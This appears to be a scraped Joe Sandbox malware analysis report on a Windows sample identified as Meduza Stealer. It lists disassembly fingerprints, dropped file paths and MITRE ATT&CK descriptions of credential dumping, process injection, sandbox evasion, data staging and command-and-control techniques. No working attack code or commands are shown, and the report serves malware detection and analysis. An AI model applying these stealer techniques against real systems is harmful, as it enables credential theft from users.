Associated: 00000008.00000002.2651153995.00007FF6A72C3000.00000002.00000001.01000000.0000000C.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_7ff6a7040000_wbfTHB1mDB.jbxd

Similarity

API ID: ExceptionFileHeaderRaise
String ID: csm
API String ID: 2573137834-1018135373
Opcode ID: 1d5299c32aecaf4e52da69cfbe893816f0db3639ef3e806bbd38833a72797da0
Instruction ID: 42312f46ee832f2f8eecd4138acd785450f6eb0ea74a1b20d937971f36483db4
Opcode Fuzzy Hash: 1d5299c32aecaf4e52da69cfbe893816f0db3639ef3e806bbd38833a72797da0
Instruction Fuzzy Hash: AC115B72609F4182EB208F15E41426A77E4FB88B88F584630EB8C87768EF7CC561CB00

Function 00007FF6A704D2D0 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 28COMMON

Download Yara Rule

APIs

_invalid_parameter_noinfo_noreturn.LIBCMT ref: 00007FF6A704D99C
std::_Xinvalid_argument.LIBCPMT ref: 00007FF6A704D9A9

Strings

String pointer is null., xrefs: 00007FF6A704D9A2

Memory Dump Source

Source File: 00000008.00000002.2650917322.00007FF6A7041000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00007FF6A7040000, based on PE: true

Associated: 00000008.00000002.2650893205.00007FF6A7040000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000008.00000002.2650951880.00007FF6A7078000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000008.00000002.2650951880.00007FF6A72B6000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000008.00000002.2651113736.00007FF6A72C0000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000008.00000002.2651153995.00007FF6A72C3000.00000002.00000001.01000000.0000000C.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_7ff6a7040000_wbfTHB1mDB.jbxd

Similarity

API ID: Xinvalid_argument_invalid_parameter_noinfo_noreturnstd::_
String ID: String pointer is null.
API String ID: 1132134225-696828624
Opcode ID: 21e1dd80da370428b582362b5689f4aa856f83e19341bdea015bb3c94b807656
Instruction ID: cecf1e868d2321e6e33d4e497cc4aeef04d774966c6ea7c1ce4106cbaf74381b
Opcode Fuzzy Hash: 21e1dd80da370428b582362b5689f4aa856f83e19341bdea015bb3c94b807656
Instruction Fuzzy Hash: 3EF0E2A1519A8596E6248F2ABD24BF92360BF59788F504531FE4CC2759CE7CE225C200

Description:	Adversaries may interact with the native OS application programming interface (API) to execute behaviors. Native APIs provide a controlled means of calling low-level OS services within the kernel, such as those involving hardware/devices, memory, and processes.These native APIs are leveraged by the OS during system boot (when other system components are not yet initialized) as well as carrying out tasks and requests during routine operations.
Tactics:	Execution
Data Sources:	Module: Module Load, Process: OS API Execution
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may abuse command and script interpreters to execute commands, scripts, or binaries. These interfaces and languages provide ways of interacting with computer systems and are a common feature across many different platforms. Most systems come with some built-in command-line interface and scripting capabilities, for example, macOS and Linux distributions include some flavor of Unix Shell while Windows installations include the Windows Command Shell and PowerShell .
Tactics:	Execution
Data Sources:	Command: Command Execution, Module: Module Load, Process: Process Creation, Process: Process Metadata, Script: Script Execution
Platforms:	Azure AD, Google Workspace, IaaS, Linux, macOS, Network, Office 365, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may abuse PowerShell commands and scripts for execution. PowerShell is a powerful interactive command-line interface and scripting environment included in the Windows operating system.Adversaries can use PowerShell to perform a number of actions, including discovery of information and execution of code. Examples include the `Start-Process` cmdlet which can be used to run an executable and the `Invoke-Command` cmdlet which runs a command locally or on a remote computer (though administrator permissions are required to use PowerShell to connect to remote systems).
Tactics:	Execution
Data Sources:	Command: Command Execution, Module: Module Load, Process: Process Creation, Process: Process Metadata, Script: Script Execution
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may execute their own malicious payloads by side-loading DLLs. Similar to DLL Search Order Hijacking , side-loading involves hijacking which DLL a program loads. But rather than just planting the DLL within the search order of a program then waiting for the victim application to be invoked, adversaries may directly side-load their payloads by planting then invoking a legitimate application that executes their payload(s).
Tactics:	Defense Evasion, Persistence, Privilege Escalation
Data Sources:	File: File Creation, File: File Modification, Module: Module Load, Process: Process Creation
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may exploit software vulnerabilities in an attempt to elevate privileges. Exploitation of a software vulnerability occurs when an adversary takes advantage of a programming error in a program, service, or within the operating system software or kernel itself to execute adversary-controlled code. Security constructs such as permission levels will often hinder access to information and use of certain techniques, so adversaries will likely need to perform privilege escalation to include use of software exploitation to circumvent those restrictions.
Tactics:	Privilege Escalation
Data Sources:	Driver: Driver Load, Process: Process Creation
Platforms:	Containers, Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may modify access tokens to operate under a different user or system security context to perform actions and bypass access controls. Windows uses access tokens to determine the ownership of a running process. A user can manipulate access tokens to make a running process appear as though it is the child of a different process or belongs to someone other than the user that started the process. When this occurs, the process also takes on the security context associated with the new token.
Tactics:	Defense Evasion, Privilege Escalation
Data Sources:	Active Directory: Active Directory Object Modification, Command: Command Execution, Process: OS API Execution, Process: Process Creation, Process: Process Metadata, User Account: User Account Metadata
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may inject code into processes in order to evade process-based defenses as well as possibly elevate privileges. Process injection is a method of executing arbitrary code in the address space of a separate live process. Running code in the context of another process may allow access to the process's memory, system/network resources, and possibly elevated privileges. Execution via process injection may also evade detection from security products since the execution is masked under a legitimate process.
Tactics:	Defense Evasion, Privilege Escalation
Data Sources:	File: File Metadata, File: File Modification, Module: Module Load, Process: OS API Execution, Process: Process Access, Process: Process Metadata, Process: Process Modification
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may modify and/or disable security tools to avoid possible detection of their malware/tools and activities. This may take many forms, such as killing security software processes or services, modifying / deleting Registry keys or configuration files so that tools do not operate properly, or other methods to interfere with security tools scanning or reporting information. Adversaries may also disable updates to prevent the latest security patches from reaching tools on victim systems.
Tactics:	Defense Evasion
Data Sources:	Command: Command Execution, Driver: Driver Load, Process: Process Creation, Process: Process Termination, Sensor Health: Host Status, Service: Service Metadata, Windows Registry: Windows Registry Key Deletion, Windows Registry: Windows Registry Key Modification
Platforms:	Containers, IaaS, Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use Obfuscated Files or Information to hide artifacts of an intrusion from analysis. They may require separate mechanisms to decode or deobfuscate that information depending on how they intend to use it. Methods for doing that include built-in functionality of malware or by using utilities present on the system.
Tactics:	Defense Evasion
Data Sources:	File: File Modification, Process: Process Creation, Script: Script Execution
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to make an executable or file difficult to discover or analyze by encrypting, encoding, or otherwise obfuscating its contents on the system or in transit. This is common behavior that can be used across different platforms and the network to evade defenses.
Tactics:	Defense Evasion
Data Sources:	Command: Command Execution, File: File Creation, File: File Metadata, Module: Module Load, Process: OS API Execution, Process: Process Creation, Script: Script Execution, WMI: WMI Creation, Windows Registry: Windows Registry Key Creation
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may modify file time attributes to hide new or changes to existing files. Timestomping is a technique that modifies the timestamps of a file (the modify, access, create, and change times), often to mimic files that are in the same folder. This is done, for example, on files that have been modified or created by the adversary so that they do not appear conspicuous to forensic investigators or file analysis tools.
Tactics:	Defense Evasion
Data Sources:	File: File Metadata, File: File Modification
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to manipulate features of their artifacts to make them appear legitimate or benign to users and/or security tools. Masquerading occurs when the name or location of an object, legitimate or malicious, is manipulated or abused for the sake of evading defenses and observation. This may include manipulating file metadata, tricking users into misidentifying the file type, and giving legitimate task or service names.
Tactics:	Defense Evasion
Data Sources:	Command: Command Execution, File: File Metadata, File: File Modification, Image: Image Metadata, Process: OS API Execution, Process: Process Creation, Process: Process Metadata, Scheduled Job: Scheduled Job Metadata, Scheduled Job: Scheduled Job Modification, Service: Service Creation, Service: Service Metadata
Platforms:	Containers, Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ various means to detect and avoid virtualization and analysis environments. This may include changing behaviors based on the results of checks for the presence of artifacts indicative of a virtual machine environment (VME) or sandbox. If the adversary detects a VME, they may alter their malware to disengage from the victim or conceal the core functions of the implant. They may also search for VME artifacts before dropping secondary or additional payloads. Adversaries may use the information learned from [Virtualization/Sandbox Evasion](https://attack.mitre.org/techniques/T1497) during automated discovery to shape follow-on behaviors.
Tactics:	Defense Evasion, Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to dump credentials to obtain account login and credential material, normally in the form of a hash or a clear text password, from the operating system and software. Credentials can then be used to perform Lateral Movement and access restricted information.
Tactics:	Credential Access
Data Sources:	Active Directory: Active Directory Object Access, Command: Command Execution, File: File Access, Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow, Process: OS API Execution, Process: Process Access, Process: Process Creation, Windows Registry: Windows Registry Key Access
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may gather the system time and/or time zone from a local or remote system. The system time is set and stored by the Windows Time Service within a domain to maintain time synchronization between systems and services in an enterprise network.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get a listing of valid accounts, usernames, or email addresses on a system or within a compromised environment. This information can help adversaries determine which accounts exist, which can aid in follow-on behavior such as brute-forcing, spear-phishing attacks, or account takeovers (e.g., Valid Accounts ).
Tactics:	Discovery
Data Sources:	Command: Command Execution, File: File Access, Process: Process Creation
Platforms:	Azure AD, Google Workspace, IaaS, Linux, macOS, Office 365, SaaS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may enumerate files and directories or may search in specific locations of a host or network share for certain information within a file system. Adversaries may use the information from File and Directory Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may attempt to get detailed information about the operating system and hardware, including version, patches, hotfixes, service packs, and architecture. Adversaries may use the information from System Information Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	IaaS, Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get information about running processes on a system. Information obtained could be used to gain an understanding of common software/applications running on systems within the network. Adversaries may use the information from Process Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to identify the primary user, currently logged in user, set of users that commonly uses a system, or whether a user is actively using the system. They may do this, for example, by retrieving account usernames or by using OS Credential Dumping . The information may be collected in a number of different ways using other Discovery techniques, because user and username details are prevalent throughout a system and include running process ownership, file/directory ownership, session information, and system logs. Adversaries may use the information from [System Owner/User Discovery](https://attack.mitre.org/techniques/T1033) during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Active Directory: Active Directory Object Access, Command: Command Execution, File: File Access, Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow, Process: OS API Execution, Process: Process Access, Process: Process Creation, Windows Registry: Windows Registry Key Access
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Behavior Section

Behavior Chronological

Disassembly

Uncategorized

Graph

Loading Joe Sandbox Report ...

Warning!

Windows Analysis Report 9RM52QaURq.exe

Overview

General Information

Detection

Signatures

Classification

Process Tree

Malware Configuration

Threatname: Meduza Stealer

Yara Signatures

Memory Dumps

Unpacked PEs

Sigma Signatures

System Summary

Suricata Signatures

Joe Sandbox Signatures

AV Detection

Cryptography

Compliance

Spreading

Software Vulnerabilities

Networking

Key, Mouse, Clipboard, Microphone and Screen Capturing

System Summary

Data Obfuscation

Persistence and Installation Behavior

Hooking and other Techniques for Hiding and Protection

Malware Analysis System Evasion

Anti Debugging

HIPS / PFW / Operating System Protection Evasion

Language, Device and Operating System Detection

Stealing of Sensitive Information

Remote Access Functionality

Mitre Att&ck Matrix

Behavior Graph

Screenshots

Thumbnails

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

Dropped Files

Unpacked PE Files

Domains

URLs

Domains and IPs

Contacted Domains

Contacted URLs

URLs from Memory and Binaries

World Map of Contacted IPs

Public IPs

General Information

Warnings

Simulations

Behavior and APIs

Joe Sandbox View / Context

IPs

Domains

ASNs

JA3 Fingerprints

Dropped Files

Created / dropped Files

C:\Users\user\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\9RM52QaURq.exe.log

C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

C:\Users\user\AppData\Local\Temp\UaZEqnG5nO\wbfTHB1mDB.exe

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_hmmzq2wr.y1r.ps1

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_s001qxw5.2ya.psm1

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_tm2bg4am.j3g.ps1

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_twewbqs0.kil.psm1

Static File Info

General

File Icon

Static PE Info

General

Entrypoint Preview

Windows Analysis Report
9RM52QaURq.exe

Function 075705E8 Relevance: 1.9, Strings: 1, Instructions: 654
COMMON

Function 0550D3E9 Relevance: 6.1, APIs: 4, Instructions: 131
threadCOMMON

Function 0550D3F8 Relevance: 6.1, APIs: 4, Instructions: 128
threadCOMMON

Function 07573DD0 Relevance: 3.2, APIs: 2, Instructions: 189
windowCOMMON

Function 07572C68 Relevance: 1.8, APIs: 1, Instructions: 323
COMMON

Function 0550AD68 Relevance: 1.7, APIs: 1, Instructions: 198
COMMON

Function 07572C57 Relevance: 1.7, APIs: 1, Instructions: 177
COMMON

Function 07574F90 Relevance: 1.7, APIs: 1, Instructions: 157
threadCOMMON

Function 055044B4 Relevance: 1.6, APIs: 1, Instructions: 96
COMMON

Function 0550590C Relevance: 1.6, APIs: 1, Instructions: 96
COMMON

Function 0550D701 Relevance: 1.6, APIs: 1, Instructions: 84
COMMON

Function 07573AB8 Relevance: 1.6, APIs: 1, Instructions: 71
threadCOMMON

Function 07573345 Relevance: 1.6, APIs: 1, Instructions: 65
threadCOMMON

Function 07573AC8 Relevance: 1.6, APIs: 1, Instructions: 63
threadCOMMON

Description:	Adversaries may look for details about the network configuration and settings, such as IP and/or MAC addresses, of systems they access or through information discovery of remote systems. Several operating system administration utilities exist that can be used to gather this information. Examples include Arp , ipconfig / ifconfig , nbtstat , and route .
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation, Script: Script Execution
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may compress and/or encrypt data that is collected prior to exfiltration. Compressing the data can help to obfuscate the collected data and minimize the amount of data sent over the network. Encryption can be used to hide information that is being exfiltrated from detection or make exfiltration less conspicuous upon inspection by a defender.
Tactics:	Collection
Data Sources:	Command: Command Execution, File: File Creation, Process: Process Creation, Script: Script Execution
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may search local system sources, such as file systems and configuration files or local databases, to find files of interest and sensitive data prior to Exfiltration.
Tactics:	Collection
Data Sources:	Command: Command Execution, File: File Access, Process: OS API Execution, Process: Process Creation, Script: Script Execution
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to take screen captures of the desktop to gather information over the course of an operation. Screen capturing functionality may be included as a feature of a remote access tool used in post-compromise operations. Taking a screenshot is also typically possible through native utilities or API calls, such as `CopyFromScreen` , `xwd` , or `screencapture` .
Tactics:	Collection
Data Sources:	Command: Command Execution, Process: OS API Execution
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may target user email to collect sensitive information. Emails may contain sensitive data, including trade secrets or personal information, that can prove valuable to adversaries. Adversaries can collect or forward email from mail servers or clients.
Tactics:	Collection
Data Sources:	Application Log: Application Log Content, Command: Command Execution, File: File Access, Logon Session: Logon Session Creation, Network Traffic: Network Connection Creation
Platforms:	Google Workspace, Linux, macOS, Office 365, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may transfer tools or other files from an external system into a compromised environment. Tools or files may be copied from an external adversary-controlled system to the victim network through the command and control channel or through alternate protocols such as ftp . Once present, adversaries may also transfer/spread tools between victim devices within a compromised environment (i.e. Lateral Tool Transfer ).
Tactics:	Command and Control
Data Sources:	Command: Command Execution, File: File Creation, Network Traffic: Network Connection Creation, Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ a known encryption algorithm to conceal command and control traffic rather than relying on any inherent protections provided by a communication protocol. Despite the use of a secure algorithm, these implementations may be vulnerable to reverse engineering if secret keys are encoded and/or generated within malware samples/configuration files.
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may communicate using a protocol and port pairing that are typically not associated. For example, HTTPS over port 8088or port 587as opposed to the traditional port 443. Adversaries may make changes to the standard port used by a protocol to bypass filtering or muddle analysis/parsing of network data.
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use an OSI non-application layer protocol for communication between host and C2 server or among infected hosts within a network. The list of possible protocols is extensive.Specific examples include use of network layer protocols, such as the Internet Control Message Protocol (ICMP), transport layer protocols, such as the User Datagram Protocol (UDP), session layer protocols, such as Socket Secure (SOCKS), as well as redirected/tunneled protocols, such as Serial over LAN (SOL).
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may communicate using OSI application layer protocols to avoid detection/network filtering by blending in with existing traffic. Commands to the remote system, and often the results of those commands, will be embedded within the protocol traffic between the client and server.
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre